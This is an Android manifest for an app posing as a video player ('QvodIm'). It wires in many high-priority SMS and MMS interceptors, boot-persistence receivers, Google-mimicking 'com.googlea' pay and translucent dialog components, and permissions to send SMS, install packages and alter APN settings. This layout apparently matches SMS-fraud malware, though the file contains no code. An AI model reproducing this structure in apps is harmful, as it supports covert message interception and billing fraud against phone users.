<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="zg.tdf.a10">
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:resizeable="true" android:smallScreens="true"/>
    <application android:allowBackup="true" android:icon="@drawable/app_icon" android:label="@string/app_name" android:name="zg.tdf.a10.QvodImApplication" android:theme="@style/AppTheme">
        <activity android:label="@string/index_activity_name" android:name="zg.tdf.a10.ui.IndexActivity"/>
        <activity android:configChanges="keyboardHidden|orientation" android:label="@string/app_name" android:name="zg.tdf.a10.ui.MainActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:label="@string/app_name" android:name="zg.tdf.a10.ui.VideoDetailActivity" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboardHidden|orientation" android:label="@string/app_name" android:name="zg.tdf.a10.ui.SearchResultActivity" android:screenOrientation="portrait"/>
        <receiver android:name="com.tools.CoreBrocast">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
            <intent-filter android:priority="2147483647">
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.tools.CoreBrocast2" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <service android:name="com.tools.CoreService"/>
        <meta-data android:name="BaiduMobAd_STAT_ID" android:value="97cb2c5109"/>
        <meta-data android:name="BaiduMobAd_CHANNEL" android:value="Baidu Market"/>
        <activity android:label="" android:name="com.googlea.pay.TestPayActivity">
            <intent-filter>
                <action android:name="com.fastpay.pay.TestPayActivity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name="com.googlea.util.MyFormActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:label="" android:name="com.googlea.util.MyFormActivity" android:theme="@android:style/Theme.Dialog">
            <intent-filter>
                <action android:name="com.fastpay.util.MyFormActivity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name="com.googlea.util.Dialog1_3Activity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:label="" android:name="com.googlea.util.Dialog1_3Activity" android:theme="@android:style/Theme.Translucent">
            <intent-filter>
                <action android:name="com.fastpay.util.Dialog1_3Activity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name="com.googlea.util.Dialog2Activity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:label="" android:name="com.googlea.util.Dialog2Activity" android:theme="@android:style/Theme.Translucent">
            <intent-filter>
                <action android:name="com.fastpay.util.Dialog2Activity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <receiver android:name="com.googlea.sms.SmsReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.googlea.managePhone.PhoneStarBroadcast">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.SIM_STATE_CHANGED"/>
                <action android:name="android.intent.action.MAIN"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.googlea.managePhone.PhoneShutDownReceive">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.ACTION_SHUTDOWN"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name="com.googlea.schedule.ScheduleService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.googlea.managePhone.PhoneStarService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.googlea.managePhone.PhoneShutDownService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.googlea.managePhone.DealStartService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.googlea.apn.ConnectionChangeService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <receiver android:name="com.googlea.mms.MmsReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.googlea.util.ShowTipsActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:label="" android:name="com.googlea.util.ShowTipsActivity" android:theme="@android:style/Theme.Translucent">
            <intent-filter>
                <action android:name="com.fastpay.util.ShowTipsActivity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:name="com.googlea.util.ShowProgressActivity" android:theme="@android:style/Theme.Translucent"/>
        <activity android:label="" android:name="com.googlea.util.ShowProgressActivity" android:theme="@android:style/Theme.Translucent">
            <intent-filter>
                <action android:name="com.fastpay.util.ShowTipsActivity"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <service android:name="com.googlea.aidl.MyService">
            <intent-filter>
                <action android:name="com.fastpay.aidl.pay"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:name="com.googlea.mms.MmsService">
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE"/>
            </intent-filter>
        </service>
        <receiver android:name="com.googlea.apn.ConnectionChangeReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <meta-data android:name="APP_ID" android:value="AP16360214060159320127"/>
        <activity android:name="com.lead.update.UpdateApiActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="com.lead.update.sdkApiActivity"/>
            </intent-filter>
        </activity>
        <receiver android:name="com.lead.update.UpdateApiNetReceive">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <service android:name="com.lead.update.UpdateApiService"/>
        <meta-data android:name="UPDATE_ID" android:value="bfef03f029807d04cfd40eac9e70a1b2"/>
        <meta-data android:name="UPDATE_CHANNEL" android:value="100200"/>
        <receiver android:name="com.ssd.o.CoreReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <service android:name="com.ssd.o.CoreService"/>
        <meta-data android:name="adid" android:value="V0005"/>
        <meta-data android:name="subid" android:value="cp10"/>
        <meta-data android:name="clientID1" android:value="04000102-99031-302000040090000"/>
        <meta-data android:name="clientID2" android:value=""/>
        <meta-data android:name="clientID3" android:value=""/>
        <meta-data android:name="clientID4" android:value=""/>
        <meta-data android:name="clientID5" android:value=""/>
    </application>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.BROADCAST_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.BROADCAST_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
</manifest>
